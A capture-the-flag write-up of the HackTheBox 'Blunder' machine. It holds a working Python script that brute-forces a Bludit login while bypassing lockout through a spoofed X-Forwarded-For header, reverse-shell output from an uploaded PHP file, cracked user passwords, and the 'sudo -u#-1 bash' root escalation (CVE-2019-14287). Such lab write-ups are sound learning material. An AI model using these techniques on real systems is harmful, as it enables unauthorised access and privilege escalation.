BLUNDER HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 12:26 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 12:26
    Completed NSE at 12:26, 0.00s elapsed
    Initiating NSE at 12:26
    Completed NSE at 12:26, 0.00s elapsed
    Initiating NSE at 12:26
    Completed NSE at 12:26, 0.00s elapsed
    Initiating Ping Scan at 12:26
    Scanning 10.10.10.191 [4 ports]
    Completed Ping Scan at 12:26, 0.30s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 12:26
    Scanning blunder.htb (10.10.10.191) [1000 ports]
    Discovered open port 80/tcp on 10.10.10.191
    Completed SYN Stealth Scan at 12:27, 27.74s elapsed (1000 total ports)
    Initiating Service scan at 12:27
    Scanning 1 service on blunder.htb (10.10.10.191)
    Completed Service scan at 12:27, 7.31s elapsed (1 service on 1 host)
    Initiating OS detection (try #1) against blunder.htb (10.10.10.191)
    Retrying OS detection (try #2) against blunder.htb (10.10.10.191)
    Initiating Traceroute at 12:27
    Completed Traceroute at 12:27, 0.59s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 12:27
    Completed Parallel DNS resolution of 2 hosts. at 12:27, 0.34s elapsed
    NSE: Script scanning 10.10.10.191.
    Initiating NSE at 12:27
    Completed NSE at 12:27, 17.17s elapsed
    Initiating NSE at 12:27
    Completed NSE at 12:27, 6.48s elapsed
    Initiating NSE at 12:27
    Completed NSE at 12:27, 0.00s elapsed
    Nmap scan report for blunder.htb (10.10.10.191)
    Host is up (0.50s latency).
    Not shown: 998 filtered ports
    PORT   STATE  SERVICE VERSION
    21/tcp closed ftp
    80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
    |_http-generator: Blunder
    | http-methods: 
    |_  Supported Methods: GET POST OPTIONS
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Blunder | A blunder of interesting facts
    Aggressive OS guesses: HP P2000 G3 NAS device (91%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (88%), Aruba Instant AP (ArubaOS 6.4.2.6) (88%), Linux 3.5 (88%), Linux 3.1 (88%), Linux 3.2 (88%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%), OpenWrt White Russian 0.9 (Linux 2.4.30) (87%), Asus RT-AC66U router (Linux 2.6) (87%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 124.799 days (since Tue Jan 28 17:17:54 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=262 (Good luck!)
    IP ID Sequence Generation: All zeros

    TRACEROUTE (using port 21/tcp)
    HOP RTT       ADDRESS
    1   519.77 ms 10.10.14.1
    2   584.24 ms blunder.htb (10.10.10.191)

    NSE: Script Post-scanning.
    Initiating NSE at 12:27
    Completed NSE at 12:27, 0.00s elapsed
    Initiating NSE at 12:27
    Completed NSE at 12:27, 0.00s elapsed
    Initiating NSE at 12:27
    Completed NSE at 12:27, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 73.04 seconds
            Raw packets sent: 2091 (95.524KB) | Rcvd: 102 (9.976KB)

PORT 80 ENUMERATION

Here we got nothing so after trying diff we directories manualy I got admin one working

So I used hit and trial method but nothing worked .So through its source code i know its Bludit 3.9.2 . So i searched for its exploit and got one script.

https://rastating.github.io/bludit-brute-force-mitigation-bypass/

But for that we need username and password

So I used WFUZZ to get futher directories and files..

I got 3 files :

• robots.txt
• install.php
• todo.txt

From where i got name of the user now for passowrds i tried rockyou but it was huge and giving no response so as machine was easy i looked for creating password list from its website using CEWL to create passwords using its webpage!!

I got password file as word.txt and modified some of script portion to get my wordlist in it and there i got password for that!!

    #!/usr/bin/env python3
    import re
    import requests

    host = 'http://10.10.10.191/'
    login_url = host + '/admin/'
    username = "fergus"
    wordlist = []

    with open("word.txt", "r") as file:
        for line in file:
        wordlist.append(line.rstrip())


    #for password in wordlist:
    #    print(password)

    for password in wordlist:
        session = requests.Session()
        login_page = session.get(login_url)
        csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)


        print('[] Trying: {p}'.format(p = password))

        headers = {
            'X-Forwarded-For': password,
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
            'Referer': login_url
        }

        data = {
            'tokenCSRF': csrf_token,
            'username': username,
            'password': password,
            'save': ''
        }

        login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

        if 'location' in login_result.headers:
            if '/admin/dashboard' in login_result.headers['location']:
                print()
                print('SUCCESS: Password found!')
                print('Use {u}:{p} to login.'.format(u = username, p = password))
                print()
                break

fergus : RolandDeschain

And I got dashboard of BLUDIT

Now lets search for its exploit ::

There are 2 Exploits

• Metasploit
• File upload manually (I got shell using this …)

I dont know why metasploit didnt worked for me !!

It was showing some error like UUID not found

So I chose the manual way to do that!!

I will not be explaining everything here but you can see main screenshots of procedure I went Through !!

It may happen that you wont get through exploit so through above screenshots you can easily go through

Do listen over port you gave in php script which you uploaded as image in above procedure..

    root@liquid:~/Desktop/HTB/blunder# nc -lnvp 8888
    listening on [any] 8888 ...
    connect to [10.10.14.140] from (UNKNOWN) [10.10.10.191] 36744
    Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
    07:50:51 up 11 min,  1 user,  load average: 55.70, 58.31, 34.96
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    shaun    :0       :0               07:39   ?xdm?   9:10   0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

but still we need better user to get user.txt

ESCALATION TO USER

Here in passwd file we can see that we have

    shaun:x:1000:1000:blunder,,,:/home/shaun:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    hugo:x:1001:1001:Hugo,1337,07,08,09:/home/hugo:/bin/bash
    temp:x:1002:1002:,,,:/home/temp:/bin/bash

we have 3 users available !!

So after searching I got two Folders named Bludit in /var/www

Enumerating through that folder

I got database file where I got password for user hugo!!

but it was encrypted sha1

So after decryption I got this

hugo : faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120

  root@liquid:~/Desktop/HTB/blunder# nc -lnvp 8888
    listening on [any] 8888 ...
    connect to [10.10.14.140] from (UNKNOWN) [10.10.10.191] 36744
    Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
    07:50:51 up 11 min,  1 user,  load average: 55.70, 58.31, 34.96
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    shaun    :0       :0               07:39   ?xdm?   9:10   0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $ su hugo
    Password: Password120
    id
    uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)

Yes i have been using shell simple not upgraded but i will do it during root access

After this we got our flag user.txt

GETTING ROOT ACCESS

After running the obvious command sudo -l we got this :

    hugo@blunder:~$ sudo -l
    sudo -l
    Password: Password120

    Matching Defaults entries for hugo on blunder:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User hugo may run the following commands on blunder:
        (ALL, !root) /bin/bash

Which is damn easy because I remember its privilege escalation while I was practicing on TRYHACKME platform

https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability

    hugo@blunder:~$ sudo -u#-1 bash
    sudo -u#-1 bash
    root@blunder:/home/hugo# id
    id
    uid=0(root) gid=1001(hugo) groups=1001(hugo)
    root@blunder:/root# cat root.txt
    cat root.txt
    865bc95ef711052189a2b557f6df593d

Here we got with our root flag too!!